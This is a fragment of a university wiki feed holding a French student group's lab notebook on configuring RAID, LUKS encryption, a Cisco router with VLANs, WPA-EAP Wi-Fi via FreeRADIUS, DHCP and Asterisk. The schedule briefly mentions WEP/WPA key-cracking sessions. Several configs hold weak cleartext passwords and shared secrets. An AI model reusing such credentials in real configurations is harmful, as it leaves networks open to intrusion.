      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant '''service isc-dhcp-server restart'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:DHCP iphone.png || center || 350px]] &amp;lt;br /&amp;gt;&lt;br /&gt;
et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.10&lt;br /&gt;
PING 10.60.6.10 (10.60.6.10) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=1 ttl=63 time=81.8 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=2 ttl=63 time=132 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=3 ttl=63 time=69.4 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====PCBX=====&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=ThomasStephane&lt;br /&gt;
username=trojSmaia&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis, nous avons modifiés le fichier /etc/asterisk/extensions.conf pour ajouter le contexte work à notre PCBX:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous n'avons pas encore testé cette solution.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:DHCP_iphone.png&amp;diff=35996</id>
		<title>Fichier:DHCP iphone.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:DHCP_iphone.png&amp;diff=35996"/>
				<updated>2016-12-13T14:05:33Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35995</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35995"/>
				<updated>2016-12-13T14:05:04Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Serveur DHCP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
